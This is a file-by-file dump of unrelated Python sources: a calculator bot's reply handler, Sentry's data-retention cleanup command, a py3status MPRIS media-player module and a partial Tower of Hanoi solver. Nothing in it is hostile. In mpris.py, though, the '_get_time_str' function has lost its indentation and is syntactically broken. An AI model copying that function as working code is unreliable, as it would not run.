                if str(value) == str(expression) or str(query) == str(expression): self.respond_raw("{} :point_right: {}".format(query, formatted_value))
                else: self.respond_raw("{} :point_right: {} :point_right: {}".format(query, expression, formatted_value))
            else:
                self.respond_raw("{} :point_right: {}".format(query, expression))
        return True
if __name__ == "__main__":
    # Manual smoke test: a symbolic integral, a syntax error, and unit math.
    print(evaluate_with_time_limit("integrate(1/x, x)"))
    print(evaluate_with_time_limit("1+/a"))
    print(evaluate_with_time_limit("1kg meter/second**2 + 2 newtons"))
|
cleanup.py | from __future__ import absolute_import, print_function
import os
from datetime import timedelta
from uuid import uuid4
import click
from django.utils import timezone
from sentry.runner.decorators import log_options
from six.moves import xrange
# allows services like tagstore to add their own (abstracted) models
# to cleanup
# Entries are (model, datetime_field, order_by) tuples, merged into
# BULK_QUERY_DELETES below and skipped by the generic deletion workers.
EXTRA_BULK_QUERY_DELETES = []
def get_project(value):
    """Resolve a --project option value to a project id.

    Accepts either a numeric id or an "org/project" slug pair. Returns the
    id as an int, or None when the value cannot be resolved.
    """
    from sentry.models import Project
    try:
        # Plain numeric id: use it directly.
        if value.isdigit():
            return int(value)
        if '/' not in value:
            return None
        org, proj = value.split('/', 1)
        return Project.objects.get_from_cache(
            organization__slug=org,
            slug=proj,
        ).id
    except Project.DoesNotExist:
        return None
# We need a unique value to indicate when to stop multiprocessing queue
# an identity on an object() isn't guaranteed to work between parent
# and child proc
_STOP_WORKER = '91650ec271ae4b3e8a67cdc909d80f8c'
# NOTE(review): presumably the retention window for expired API tokens,
# in days — confirm against where it is used (outside this chunk).
API_TOKEN_TTL_IN_DAYS = 30
def multiprocess_worker(task_queue):
    """Worker-process loop: delete chunks of model rows pulled from task_queue.

    Each task is a (model_import_path, id_chunk) pair; the _STOP_WORKER
    sentinel terminates the loop. Sentry is configured lazily on the first
    task so that process forking happens before app configuration.
    """
    # Configure within each Process
    import logging
    from sentry.utils.imports import import_string
    logger = logging.getLogger('sentry.cleanup')
    configured = False
    while True:
        j = task_queue.get()
        if j == _STOP_WORKER:
            task_queue.task_done()
            return
        # On first task, configure Sentry environment
        if not configured:
            from sentry.runner import configure
            configure()
            from sentry import models
            from sentry import deletions
            from sentry import similarity
            skip_models = [
                # Handled by other parts of cleanup
                models.Event,
                models.EventMapping,
                models.EventAttachment,
                models.UserReport,
                models.Group,
                models.GroupEmailThread,
                models.GroupRuleStatus,
                # Handled by TTL
                similarity.features,
            ] + [b[0] for b in EXTRA_BULK_QUERY_DELETES]
            configured = True
        model, chunk = j
        model = import_string(model)
        try:
            # Delete this chunk (and its child relations) in bounded steps.
            task = deletions.get(
                model=model,
                query={'id__in': chunk},
                skip_models=skip_models,
                transaction_id=uuid4().hex,
            )
            while True:
                if not task.chunk():
                    break
        except Exception as e:
            # Log and keep the worker alive for the next task.
            logger.exception(e)
        finally:
            task_queue.task_done()
@click.command()
@click.option('--days', default=30, show_default=True, help='Numbers of days to truncate on.')
@click.option('--project', help='Limit truncation to only entries from project.')
@click.option(
    '--concurrency',
    type=int,
    default=1,
    show_default=True,
    help='The total number of concurrent worker processes to run.'
)
@click.option(
    '--silent', '-q', default=False, is_flag=True, help='Run quietly. No output on success.'
)
@click.option('--model', '-m', multiple=True)
@click.option('--router', '-r', default=None, help='Database router')
@click.option(
    '--timed',
    '-t',
    default=False,
    is_flag=True,
    help='Send the duration of this command to internal metrics.'
)
@log_options()
def cleanup(days, project, concurrency, silent, model, router, timed):
    """Delete a portion of trailing data based on creation date.

    All data that is older than `--days` will be deleted. The default for
    this is 30 days. In the default setting all projects will be truncated,
    but if you want to limit this to a specific project, use the `--project`
    flag, which accepts a project ID or a string with the form `org/project`
    where both are slugs.
    """
    if concurrency < 1:
        click.echo('Error: Minimum concurrency is 1', err=True)
        raise click.Abort()

    # Marker for the rest of the app that a cleanup run is in progress --
    # presumably consulted elsewhere in Sentry; TODO confirm consumers.
    os.environ['_SENTRY_CLEANUP'] = '1'

    # Make sure we fork off multiprocessing pool
    # before we import or configure the app
    from multiprocessing import Process, JoinableQueue as Queue

    # Worker pool that performs the relation-aware deletions queued below.
    # Daemonized so stray workers die with the parent process.
    pool = []
    task_queue = Queue(1000)
    for _ in xrange(concurrency):  # NOTE: Python 2 file (`xrange`)
        p = Process(target=multiprocess_worker, args=(task_queue,))
        p.daemon = True
        p.start()
        pool.append(p)

    from sentry.runner import configure
    configure()

    from django.db import router as db_router
    from sentry.app import nodestore
    from sentry.db.deletion import BulkDeleteQuery
    from sentry import models

    if timed:
        import time
        from sentry.utils import metrics
        start_time = time.time()

    # list of models which this query is restricted to
    model_list = {m.lower() for m in model}

    def is_filtered(model):
        # True when the model should be skipped: either it lives on a
        # different database router, or it was excluded via --model.
        if router is not None and db_router.db_for_write(model) != router:
            return True
        if not model_list:
            return False
        return model.__name__.lower() not in model_list

    # Deletions that use `BulkDeleteQuery` (and don't need to worry about child relations)
    # (model, datetime_field, order_by)
    BULK_QUERY_DELETES = [
        (models.EventMapping, 'date_added', '-date_added'),
        (models.EventAttachment, 'date_added', None),
        (models.UserReport, 'date_added', None),
        (models.GroupEmailThread, 'date', None),
        (models.GroupRuleStatus, 'date_added', None),
    ] + EXTRA_BULK_QUERY_DELETES

    # Deletions that use the `deletions` code path (which handles their child relations)
    # (model, datetime_field, order_by)
    DELETES = (
        (models.Event, 'datetime', 'datetime'),
        (models.Group, 'last_seen', 'last_seen'),
    )

    if not silent:
        click.echo('Removing expired values for LostPasswordHash')

    if is_filtered(models.LostPasswordHash):
        if not silent:
            click.echo('>> Skipping LostPasswordHash')
    else:
        # Password-reset hashes are short-lived: a fixed 48-hour window,
        # independent of the --days option.
        models.LostPasswordHash.objects.filter(
            date_added__lte=timezone.now() - timedelta(hours=48)
        ).delete()

    if not silent:
        click.echo('Removing expired values for OrganizationMember')

    if is_filtered(models.OrganizationMember):
        if not silent:
            click.echo('>> Skipping OrganizationMember')
    else:
        expired_threshold = timezone.now() - timedelta(days=days)
        models.OrganizationMember.delete_expired(expired_threshold)

    # NOTE: this loop rebinds the `model` CLI parameter; safe because
    # `model_list` was computed from it above.
    for model in [models.ApiGrant, models.ApiToken]:
        if not silent:
            click.echo(u'Removing expired values for {}'.format(model.__name__))

        if is_filtered(model):
            if not silent:
                click.echo(u'>> Skipping {}'.format(model.__name__))
        else:
            queryset = model.objects.filter(
                expires_at__lt=(timezone.now() - timedelta(days=API_TOKEN_TTL_IN_DAYS)),
            )

            # SentryAppInstallations are associated to ApiTokens. We're okay
            # with these tokens sticking around so that the Integration can
            # refresh them, but all other non-associated tokens should be
            # deleted.
            if model is models.ApiToken:
                queryset = queryset.filter(sentry_app_installation__isnull=True)

            queryset.delete()

    project_id = None
    if project:
        click.echo(
            "Bulk NodeStore deletion not available for project selection", err=True)
        project_id = get_project(project)
        if project_id is None:
            click.echo('Error: Project not found', err=True)
            raise click.Abort()
    else:
        if not silent:
            click.echo("Removing old NodeStore values")
        cutoff = timezone.now() - timedelta(days=days)
        try:
            nodestore.cleanup(cutoff)
        except NotImplementedError:
            click.echo(
                "NodeStore backend does not support cleanup operation", err=True)

    for bqd in BULK_QUERY_DELETES:
        # Entries are (model, dtfield, order_by) with an optional 4th
        # per-model chunk size.
        if len(bqd) == 4:
            model, dtfield, order_by, chunk_size = bqd
        else:
            chunk_size = 10000
            model, dtfield, order_by = bqd
        if not silent:
            click.echo(
                u"Removing {model} for days={days} project={project}".format(
                    model=model.__name__,
                    days=days,
                    project=project or '*',
                )
            )
        if is_filtered(model):
            if not silent:
                click.echo('>> Skipping %s' % model.__name__)
        else:
            BulkDeleteQuery(
                model=model,
                dtfield=dtfield,
                days=days,
                project_id=project_id,
                order_by=order_by,
            ).execute(chunk_size=chunk_size)

    for model, dtfield, order_by in DELETES:
        if not silent:
            click.echo(
                u"Removing {model} for days={days} project={project}".format(
                    model=model.__name__,
                    days=days,
                    project=project or '*',
                )
            )
        if is_filtered(model):
            if not silent:
                click.echo('>> Skipping %s' % model.__name__)
        else:
            imp = '.'.join((model.__module__, model.__name__))

            q = BulkDeleteQuery(
                model=model,
                dtfield=dtfield,
                days=days,
                project_id=project_id,
                order_by=order_by,
            )

            # Fan id-chunks out to the worker pool; workers run the
            # relation-aware `deletions` code path and ack via task_done().
            for chunk in q.iterator(chunk_size=100):
                task_queue.put((imp, chunk))

            task_queue.join()

    # Clean up FileBlob instances which are no longer used and aren't super
    # recent (as there could be a race between blob creation and reference)
    if not silent:
        click.echo("Cleaning up unused FileBlob references")
    if is_filtered(models.FileBlob):
        if not silent:
            click.echo('>> Skipping FileBlob')
    else:
        cleanup_unused_files(silent)

    # Shut down our pool
    for _ in pool:
        task_queue.put(_STOP_WORKER)

    # And wait for it to drain
    for p in pool:
        p.join()

    if timed:
        duration = int(time.time() - start_time)
        metrics.timing('cleanup.duration', duration, instance=router, sample_rate=1.0)
        click.echo("Clean up took %s second(s)." % duration)
def cleanup_unused_files(quiet=False):
    """Delete FileBlob rows (and their backing files) that nothing references.

    A blob is kept if any FileBlobIndex or File still points at it. Only
    blobs at least one day old are considered, so we do not race with blobs
    that were just created and are about to be referenced.
    """
    from sentry.models import File, FileBlob, FileBlobIndex
    if quiet:
        from sentry.utils.query import RangeQuerySetWrapper
    else:
        from sentry.utils.query import RangeQuerySetWrapperWithProgressBar as RangeQuerySetWrapper

    min_age_cutoff = timezone.now() - timedelta(days=1)
    candidates = FileBlob.objects.filter(timestamp__lte=min_age_cutoff)

    for candidate in RangeQuerySetWrapper(candidates):
        # Short-circuits: the File query only runs when no index entry exists.
        still_in_use = (
            FileBlobIndex.objects.filter(blob=candidate).exists()
            or File.objects.filter(blob=candidate).exists()
        )
        if not still_in_use:
            candidate.delete()
|
mpris.py | """
Display song/video and control MPRIS compatible players.
There are two ways to control the media player. Either by clicking with a mouse
button in the text information or by using buttons. For former you have
to define the button parameters in your config.
Configuration parameters:
button_next: mouse button to play the next entry (default None)
button_previous: mouse button to play the previous entry (default None)
button_stop: mouse button to stop the player (default None)
button_toggle: mouse button to toggle between play and pause mode (default 1)
    format: display format for this module, see placeholders below
        (default '[{artist} - ][{title}] {previous} {toggle} {next}')
format_none: define output if no player is running
(default 'no player running')
icon_next: specify icon for next button (default u'\u25b9')
icon_pause: specify icon for pause button (default u'\u25eb')
icon_play: specify icon for play button (default u'\u25b7')
icon_previous: specify icon for previous button (default u'\u25c3')
icon_stop: specify icon for stop button (default u'\u25a1')
player_priority: priority of the players.
Keep in mind that the state has a higher priority than
player_priority. So when player_priority is "[mpd, bomi]" and mpd is
        paused and bomi is playing, then bomi wins. (default [])
state_pause: specify icon for pause state (default u'\u25eb')
state_play: specify icon for play state (default u'\u25b7')
state_stop: specify icon for stop state (default u'\u25a1')
Format placeholders:
{album} album name
    {artist} artist name (first one)
{length} time duration of the song
{player} show name of the player
{state} playback status of the player
{time} played time of the song
{title} name of the song
{nowplaying} now playing field provided by VLC for stream info
Button placeholders:
{next} play the next title
{pause} pause the player
{play} play the player
{previous} play the previous title
{stop} stop the player
{toggle} toggle between play and pause
Color options:
color_control_inactive: button is not clickable
color_control_active: button is clickable
color_paused: song is paused, defaults to color_degraded
color_playing: song is playing, defaults to color_good
color_stopped: song is stopped, defaults to color_bad
Requires:
pydbus: pythonic d-bus library
Tested players:
bomi: powerful and easy-to-use gui multimedia player based on mpv
cantata: qt5 client for the music player daemon (mpd)
mpdris2: mpris2 support for mpd
vlc: multi-platform mpeg, vcd/dvd, and divx player
Examples:
```
mpris {
format = "{previous}{play}{next} {player}: {state} [[{artist} - {title}]|[{title}]]"
format_none = "no player"
player_priority = "[mpd, cantata, vlc, bomi, *]"
}
only show information from mpd and vlc, but mpd has a higher priority:
mpris {
player_priority = "[mpd, vlc]"
}
show information of all players, but mpd and vlc have the highest priority:
mpris {
player_priority = "[mpd, vlc, *]"
}
vlc has the lowest priority:
mpris {
player_priority = "[*, vlc]"
}
```
@author Moritz Lüdecke, tobes, valdur55
SAMPLE OUTPUT
[
{'color': '#00FF00', 'full_text': u'\xab \u25ae \xbb \u25b6 '},
{'color': '#00FF00', 'full_text': u'Happy Mondays - Fat Lady Wrestlers'}
]
"""
from datetime import timedelta
import time
from gi.repository import GObject
from gi.repository.GLib import GError
from threading import Thread
import re
import sys
from pydbus import SessionBus
# Well-known MPRIS bus-name prefix and object path (per the MPRIS D-Bus spec).
SERVICE_BUS = "org.mpris.MediaPlayer2"
SERVICE_BUS_URL = "/org/mpris/MediaPlayer2"
# Error message raised at startup when running under gevent (unsupported).
STRING_GEVENT = "this module does not work with gevent"
# Playback states ordered so that the list index doubles as display priority
# (a playing player outranks a paused one, which outranks a stopped one).
WORKING_STATES = ["Playing", "Paused", "Stopped"]
PLAYING = 0
PAUSED = 1
STOPPED = 2
def _get_time_str(microseconds):
delta = timedelta(seconds=microseconds // 1_000_000)
delta_str = str(delta).lstrip("0").lstrip(":")
if delta_str.startswith("0"):
delta_str = delta_str[1:]
return delta_str
class BrokenDBusMpris:
    """Minimal stand-in for a pydbus MPRIS proxy, used for players (Chromium,
    Chrome) whose D-Bus objects cannot be fetched via ``SessionBus.get``.

    It mimics the small surface the rest of this module touches: ``Identity``,
    ``PlaybackStatus``, ``Metadata`` and a ``PropertiesChanged`` signal.
    """

    class PropertiesChanged:
        # Emulates a pydbus signal object with connect()/disconnect().
        def __init__(self, parent, dbus):
            self._dbus = dbus
            self._parent = parent

        def connect(self, callback):
            # Subscribe to ALL signals and filter ourselves (see below).
            def combined_function(*args):
                callback(*self.filter_messages(*args))

            self._subscription = self._dbus.subscribe(signal_fired=combined_function)

        def disconnect(self):
            self._subscription.disconnect()

        # For some reason the dbus subscribe filtering doesn't work
        def filter_messages(self, *args):
            dbus_params = [
                "/org/mpris/MediaPlayer2",
                "org.freedesktop.DBus.Properties",
                "PropertiesChanged",
            ]
            # NOTE(review): only args[1] (object path) and args[2] (interface)
            # are checked; dbus_params[2] ("PropertiesChanged") is never
            # compared against anything -- confirm whether the signal name
            # (args[3]?) should be checked too.
            for i in range(1, 3):
                if args[i] != dbus_params[i - 1]:
                    return ("", {}, [])
            # The 6th is a tuple, where the actual data is in the 2nd field
            msg = args[4][1]
            if msg:
                try:
                    # Cache the latest state on the parent so property reads
                    # reflect what the signal reported.
                    if "PlaybackStatus" in msg:
                        self._parent.PlaybackStatus = msg["PlaybackStatus"]
                    if "Metadata" in msg:
                        self._parent.Metadata = msg["Metadata"]
                except KeyError:
                    pass
            return args[4]

    def __init__(self, dbus, identity, playback_status):
        self._dbus = dbus
        self.Identity = identity
        self.PlaybackStatus = playback_status
        self.PropertiesChanged = BrokenDBusMpris.PropertiesChanged(self, dbus)
        # Start with empty metadata; updated via PropertiesChanged above.
        self.Metadata = {"xesam:album": None, "xesam:artist": None, "xesam:title": None}

    def get(self, key):
        # Mirror the pydbus proxy's dict-style access for the one key used.
        data = {"subscription": self.PropertiesChanged._subscription}
        return data[key]
class Py3status:
    """
    """

    # available configuration parameters
    button_next = None        # mouse button for "next" (None = disabled)
    button_previous = None    # mouse button for "previous" (None = disabled)
    button_stop = None        # mouse button for "stop" (None = disabled)
    button_toggle = 1         # mouse button toggling play/pause
    format = "[{artist} - ][{title}] {previous} {toggle} {next}"
    format_none = "no player running"
    icon_next = "\u25b9"
    icon_pause = "\u25eb"
    icon_play = "\u25b7"
    icon_previous = "\u25c3"
    icon_stop = "\u25a1"
    player_priority = []      # preferred player order; "*" acts as wildcard
    state_pause = "\u25eb"
    state_play = "\u25b7"
    state_stop = "\u25a1"

    def post_config_hook(self):
        """Validate the environment, connect to the session bus and start the
        background listener that tracks MPRIS players."""
        if self.py3.is_gevent():
            raise Exception(STRING_GEVENT)
        self._dbus = None
        self._data = {}
        self._control_states = {}
        self._kill = False
        self._mpris_players = {}      # bus name -> player bookkeeping dict
        self._mpris_names = {}        # Identity -> short bus-name suffix
        self._mpris_name_index = {}   # Identity -> next instance index
        self._player = None           # currently selected dbus proxy
        self._player_details = {}     # bookkeeping dict of current player
        self._tries = 0               # retry counter used by mpris()
        # start last
        self._dbus = SessionBus()
        self._start_listener()
        # Static description of each control button: the MPRIS method to
        # call, the property saying whether it is clickable, and its icon.
        self._states = {
            "pause": {
                "action": "Pause",
                "clickable": "CanPause",
                "icon": self.icon_pause,
            },
            "play": {"action": "Play", "clickable": "CanPlay", "icon": self.icon_play},
            "stop": {
                "action": "Stop",
                "clickable": "True",  # The MPRIS API lacks 'CanStop' function.
                "icon": self.icon_stop,
            },
            "next": {
                "action": "Next",
                "clickable": "CanGoNext",
                "icon": self.icon_next,
            },
            "previous": {
                "action": "Previous",
                "clickable": "CanGoPrevious",
                "icon": self.icon_previous,
            },
        }

    def _init_data(self):
        """Reset the cached track data and repopulate it from the currently
        selected player."""
        self._data = {
            "album": None,
            "artist": None,
            "error_occurred": False,
            "length": None,
            "player": None,
            "state": STOPPED,
            "title": None,
            "nowplaying": None,
        }
        if self._player is None:
            self._control_states = {}
            return

        try:
            self._data["player"] = self._player.Identity
            playback_status = self._player.PlaybackStatus
            self._data["state"] = self._get_state(playback_status)
            metadata = self._player.Metadata
            self._update_metadata(metadata)
        except Exception:
            # The player may vanish mid-query; flag it so mpris() retries.
            self._data["error_occurred"] = True

    def _get_button_state(self, control_state):
        """Return True when the given control button should be clickable."""
        try:
            # Workaround: The last parameter returns True for the Stop button.
            clickable = getattr(self._player, control_state["clickable"], True)
        except Exception:
            clickable = False

        state = self._data.get("state")
        # Suppress buttons that make no sense in the current playback state.
        if control_state["action"] == "Play" and state == PLAYING:
            clickable = False
        elif control_state["action"] == "Pause" and state in [STOPPED, PAUSED]:
            clickable = False
        elif control_state["action"] == "Stop" and state == STOPPED:
            clickable = False

        return clickable

    def _get_state(self, playback_status):
        """Map an MPRIS PlaybackStatus string to a module state constant."""
        if playback_status == "Playing":
            return PLAYING
        elif playback_status == "Paused":
            return PAUSED
        else:
            return STOPPED

    def _get_text(self):
        """
        Get the current metadata

        Returns (placeholders, color, cached_until).
        """
        if self._data.get("state") == PLAYING:
            color = self.py3.COLOR_PLAYING or self.py3.COLOR_GOOD
            state_symbol = self.state_play
        elif self._data.get("state") == PAUSED:
            color = self.py3.COLOR_PAUSED or self.py3.COLOR_DEGRADED
            state_symbol = self.state_pause
        else:
            color = self.py3.COLOR_STOPPED or self.py3.COLOR_BAD
            state_symbol = self.state_stop

        if self._data.get("error_occurred"):
            color = self.py3.COLOR_BAD

        try:
            # Position is in microseconds per the MPRIS spec -- see
            # _get_time_str above; TODO confirm for BrokenDBusMpris players.
            ptime_ms = self._player.Position
            ptime = _get_time_str(ptime_ms)
        except Exception:
            ptime = None

        if (
            self.py3.format_contains(self.format, "time")
            and self._data.get("state") == PLAYING
        ):
            # Don't get trapped in aliasing errors!
            update = time.perf_counter() + 0.5
        else:
            update = self.py3.CACHE_FOREVER

        placeholders = {
            "player": self._data.get("player"),
            "state": state_symbol,
            "album": self._data.get("album"),
            "artist": self._data.get("artist"),
            "length": self._data.get("length"),
            "time": ptime,
            "title": self._data.get("title") or "No Track",
            "nowplaying": self._data.get("nowplaying"),
            # for debugging ;p
            "full_name": self._player_details.get("full_name"),
        }
        return (placeholders, color, update)

    def _get_control_states(self):
        """Return the button description map with 'toggle' pointing at either
        play or pause, depending on the current state."""
        state = "pause" if self._data.get("state") == PLAYING else "play"
        self._states["toggle"] = self._states[state]
        return self._states

    def _get_response_buttons(self):
        """Build the composite entries for the control buttons, colored by
        whether each button is currently clickable."""
        response = {}

        for button, control_state in self._control_states.items():
            if self._get_button_state(control_state):
                color = self.py3.COLOR_CONTROL_ACTIVE or self.py3.COLOR_GOOD
            else:
                color = self.py3.COLOR_CONTROL_INACTIVE or self.py3.COLOR_BAD

            response[button] = {
                "color": color,
                "full_text": control_state["icon"],
                "index": button,
            }

        return response

    def _start_loop(self):
        """Run the GLib main loop on the listener thread."""
        self._loop = GObject.MainLoop()
        # Poll for the kill flag (see _timeout).
        GObject.timeout_add(1000, self._timeout)
        try:
            self._loop.run()
        except KeyboardInterrupt:
            # This branch is only needed for the test mode
            self._kill = True

    def _name_owner_changed(self, *args):
        """D-Bus NameOwnerChanged handler: track players (dis)appearing.

        args[5] is the (name, old_owner, new_owner) tuple.
        """
        player_id = args[5][0]
        player_add = args[5][2]     # non-empty new owner => name appeared
        player_remove = args[5][1]  # non-empty old owner => name vanished
        if player_add:
            self._add_player(player_id)
        if player_remove:
            self._remove_player(player_id)
        self._set_player()

    def _set_player(self):
        """
        Sort the current players into priority order and set self._player
        Players are ordered by working state, then by preference supplied by
        user and finally by instance if a player has more than one running.
        """
        players = []
        for name, p in self._mpris_players.items():
            # we set the priority here as we need to establish the player name
            # which might not be immediately available.
            if "_priority" not in p:
                if self.player_priority:
                    try:
                        priority = self.player_priority.index(p["name"])
                    except ValueError:
                        try:
                            priority = self.player_priority.index("*")
                        except ValueError:
                            priority = None
                else:
                    priority = 0
                if priority is not None:
                    p["_priority"] = priority
            if p.get("_priority") is not None:
                players.append((p["_state_priority"], p["_priority"], p["index"], name))

        # Tuple sort: state first, then user preference, then instance index.
        if players:
            top_player = self._mpris_players.get(sorted(players)[0][3])
        else:
            top_player = {}

        self._player = top_player.get("_dbus_player")
        self._player_details = top_player

        self.py3.update()

    def _player_monitor(self, player_id):
        """Return a PropertiesChanged callback bound to `player_id`."""

        def player_on_change(*args):
            """
            Monitor a player and update its status.
            """
            data = args[1]
            status = data.get("PlaybackStatus")
            if status:
                player = self._mpris_players[player_id]
                # Note: Workaround. Since all players get noted if playback
                # status has been changed we have to check if we are the
                # chosen one
                try:
                    dbus_status = player["_dbus_player"].PlaybackStatus
                except GError:
                    # Prevent errors when calling methods of deleted dbus
                    # objects
                    return

                if status != dbus_status:
                    # FIXME: WE DON'T RECOGNIZE ANY TITLE CHANGE
                    return

                player["status"] = status
                player["_state_priority"] = WORKING_STATES.index(status)
                self._set_player()

        return player_on_change

    def _add_player(self, player_id):
        """
        Add player to mpris_players

        Returns False when the bus name is not an MPRIS player or is
        excluded by player_priority; True when it was registered.
        """
        if not player_id.startswith(SERVICE_BUS):
            return False

        # Fixes chromium/google-chrome mpris
        try:
            player = self._dbus.get(player_id, SERVICE_BUS_URL)
        except KeyError:
            if "chromium" in player_id:
                player = BrokenDBusMpris(self._dbus, "Chromium", "Stopped")
            elif "chrome" in player_id:
                player = BrokenDBusMpris(self._dbus, "Chrome", "Stopped")
            else:
                return False

        if player.Identity not in self._mpris_names:
            self._mpris_names[player.Identity] = player_id.split(".")[-1]
            # Back-fill names for players registered before we knew theirs.
            for p in self._mpris_players.values():
                if not p["name"] and p["identity"] in self._mpris_names:
                    p["name"] = self._mpris_names[p["identity"]]
                    p["full_name"] = "{} {}".format(p["name"], p["index"])

        identity = player.Identity
        name = self._mpris_names.get(identity)
        if (
            self.player_priority != []
            and name not in self.player_priority
            and "*" not in self.player_priority
        ):
            return False

        if identity not in self._mpris_name_index:
            self._mpris_name_index[identity] = 0

        status = player.PlaybackStatus
        state_priority = WORKING_STATES.index(status)
        index = self._mpris_name_index[identity]
        self._mpris_name_index[identity] += 1

        try:
            subscription = player.PropertiesChanged.connect(
                self._player_monitor(player_id)
            )
        except AttributeError:
            subscription = {}

        self._mpris_players[player_id] = {
            "_dbus_player": player,
            "_id": player_id,
            "_state_priority": state_priority,
            "index": index,
            "identity": identity,
            "name": name,
            "full_name": f"{name} {index}",
            "status": status,
            "subscription": subscription,
        }

        return True

    def _remove_player(self, player_id):
        """
        Remove player from mpris_players
        """
        player = self._mpris_players.get(player_id)
        if player:
            if player.get("subscription"):
                player["subscription"].disconnect()
            del self._mpris_players[player_id]

    def _get_players(self):
        """Scan the session bus once for already-running MPRIS players."""
        bus = self._dbus.get("org.freedesktop.DBus")
        for player in bus.ListNames():
            self._add_player(player)
        self._set_player()

    def _start_listener(self):
        """Subscribe to NameOwnerChanged, pick up existing players and spin
        up the GLib loop on a daemon thread."""
        self._dbus.con.signal_subscribe(
            None,
            "org.freedesktop.DBus",
            "NameOwnerChanged",
            None,
            None,
            0,
            self._name_owner_changed,
        )

        self._get_players()
        t = Thread(target=self._start_loop)
        t.daemon = True
        t.start()

    def _timeout(self):
        # NOTE(review): a GLib timeout source is removed when its callback
        # returns a falsy value, so this poll appears to fire only once --
        # confirm whether it should `return True` to keep checking _kill.
        if self._kill:
            self._loop.quit()
            sys.exit(0)

    def _update_metadata(self, metadata):
        """Copy the interesting xesam/mpris fields out of a Metadata dict
        into self._data, with stream-specific fallbacks."""
        is_stream = False

        try:
            if len(metadata) > 0:
                url = metadata.get("xesam:url")
                is_stream = url is not None and "file://" not in url
                self._data["title"] = metadata.get("xesam:title")
                self._data["album"] = metadata.get("xesam:album")

                if metadata.get("xesam:artist"):
                    self._data["artist"] = metadata.get("xesam:artist")[0]
                else:
                    # we assume here that we playing a video and these types of
                    # media we handle just like streams
                    is_stream = True

                length_ms = metadata.get("mpris:length")
                if length_ms is not None:
                    self._data["length"] = _get_time_str(length_ms)
            else:
                # use stream format if no metadata is available
                is_stream = True
        except Exception:
            self._data["error_occurred"] = True

        if is_stream and self._data.get("title"):
            # delete the file extension
            self._data["title"] = re.sub(r"\....$", "", self._data.get("title"))
            self._data["nowplaying"] = metadata.get("vlc:nowplaying")

    def kill(self):
        self._kill = True

    def mpris(self):
        """
        Get the current output format and return it.
        """
        if self._kill:
            raise KeyboardInterrupt

        # NOTE(review): player dicts store the bus name under "_id", not
        # "id", so this always yields None and the changed-player check
        # below can never trigger -- confirm whether this should be "_id".
        current_player_id = self._player_details.get("id")
        cached_until = self.py3.CACHE_FOREVER
        if self._player is None:
            text = self.format_none
            color = self.py3.COLOR_BAD
            composite = [{"full_text": text, "color": color}]
            self._data = {}
        else:
            self._init_data()
            (text, color, cached_until) = self._get_text()
            self._control_states = self._get_control_states()
            buttons = self._get_response_buttons()
            composite = self.py3.safe_format(self.format, dict(text, **buttons))

        if self._data.get(
            "error_occurred"
        ) or current_player_id != self._player_details.get("id"):
            # Something went wrong or the player changed during our processing
            # This is usually due to something like a player being killed
            # whilst we are checking its details
            # Retry but limit the number of attempts
            self._tries += 1
            if self._tries < 3:
                return self.mpris()

            # Max retries hit we need to output something
            composite = [
                {"full_text": "Something went wrong", "color": self.py3.COLOR_BAD}
            ]
            cached_until = self.py3.time_in(1)

        response = {
            "cached_until": cached_until,
            "color": color,
            "composite": composite,
        }

        # we are outputting so reset tries
        self._tries = 0

        return response

    def on_click(self, event):
        """
        Handles click events
        """
        index = event["index"]
        button = event["button"]

        if index not in self._control_states:
            # Click on the text portion: map the mouse button to an action.
            if button == self.button_toggle:
                index = "toggle"
            elif button == self.button_stop:
                index = "stop"
            elif button == self.button_next:
                index = "next"
            elif button == self.button_previous:
                index = "previous"
            else:
                return
        elif button != 1:
            # Clicks on the button icons only react to the left button.
            return

        try:
            control_state = self._control_states.get(index)
            if self._player and self._get_button_state(control_state):
                getattr(self._player, self._control_states[index]["action"])()
        except GError as err:
            # Player may have died between the check and the call.
            self.py3.log(str(err).split(":", 1)[-1])
# Script entry point: run the module through py3status's test harness.
if __name__ == "__main__":
    """
    Run module in test mode.
    """
    from py3status.module_test import module_test

    module_test(Py3status)
|
recursive_solver.py | from tree_viewer import TreeViewer
import Tkinter as tk
import threading
import time
# Number of disks in the Tower of Hanoi puzzle.
NUM_DISKS = 3

# Pole identifiers; used as MOVES keys and in the narration text.
Pole1 = '1'
Pole2 = '2'
Pole3 = '3'

# Primitive action codes emitted before the plan -- presumably a fixed
# setup sequence for whatever executor replays the plan; TODO confirm
# the meaning of the individual codes.
BEGIN = [1,5]

# MOVES[(frm, to)] is the canned sequence of primitive action codes that
# moves the top disk from pole `frm` to pole `to`.
MOVES = {}
MOVES[Pole1, Pole2] = [5,1,4,3,4,1,5,2,]
MOVES[Pole2, Pole1] = [3,5,1,4,2,4,1,5,]
MOVES[Pole1, Pole3] = [5,1,4,3,4,1,1,5,2,5,1,4,]
MOVES[Pole3, Pole1] = [4,1,5,3,5,1,1,4,2,4,1,5,]
MOVES[Pole3, Pole2] = [3,4,1,5,2,5,1,4,]
MOVES[Pole2, Pole3] = [4,1,5,3,5,1,4,2,]

# Action codes appended after the plan -- presumably a teardown/finish
# sequence for the executor; TODO confirm.
END = [0,0,0,5,5,1]
class RecursiveSolver:
    """Tower of Hanoi solver that narrates the classic recursive
    decomposition through a TreeViewer and produces a flat list of
    primitive action codes (BEGIN + plan + END) for execution.
    """

    def __init__(self, viewer):
        # `viewer` must provide the TreeViewer API used below
        # (display_text, user_pause, add_item_viewer, ...).
        self.num_disks = NUM_DISKS
        self.viewer = viewer

    def move(self, frm, to):
        """Return the canned action codes moving the top disk from pole
        `frm` to pole `to` (looked up in the module-level MOVES table)."""
        return MOVES[frm, to]

    def dohanoi(self, n, to, frm, using):
        """Recursively solve "move `n` disks from `frm` to `to` using
        `using` as the spare pole", narrating every subgoal in the viewer.

        Returns the concatenated list of primitive action codes.
        """
        if n == 0:
            return []
        level = self.num_disks - n
        # Indent the narration by recursion depth.
        prefix = '\t' * level
        self.viewer.display_text(prefix + "At level {0} goal is to move {1} disks from pole {2} to pole {3}".format(level, n, frm, to))
        self.viewer.user_pause('')
        if n > 1:
            self.viewer.display_text(prefix + "Decomposing the problem:")
            self.viewer.display_text(prefix + "Move {0} disks from pole {1} to pole {2}".format(n-1, frm, using))
            self.viewer.display_text(prefix + "Then move remaining disk from pole {0} to pole {1}".format(frm, to))
            self.viewer.display_text(prefix + "Then move {0} disks from pole {1} to pole {2}".format(n-1, using, to))
            subgoals = ['Move %s disks from %s to %s' % (n-1, frm, using),
                        'Move disk from %s to %s' % (frm, to),
                        'Move %s disks from %s to %s' % (n-1, using, to)]
            self.viewer.add_item_viewer("Subgoals", subgoals, -1, [])
